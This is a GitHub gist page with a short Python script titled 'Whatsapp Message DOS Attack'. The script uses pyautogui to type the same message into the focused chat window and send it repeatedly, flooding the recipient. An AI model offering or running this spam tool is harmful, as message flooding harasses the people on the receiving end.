Skip to content

Instantly share code, notes, and snippets.

@R3DHULK
Created February 10, 2023 15:42
Show Gist options
  • Save R3DHULK/20676d0af310554314cfe3bf857e17d9 to your computer and use it in GitHub Desktop.
Save R3DHULK/20676d0af310554314cfe3bf857e17d9 to your computer and use it in GitHub Desktop.
Whatsapp Message DOS Attack (Whatsapp Automation)
import pyautogui
import time
number_of_messages = int(input('\033[92m [*] Enter number of messages: '))
message_content = input('\033[92m [*] Enter message content: ')
time.sleep(3)
for num in range(number_of_messages):
pyautogui.write(message_content)
pyautogui.press('enter')
print('\033[92m [+] Script executed successfully')
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment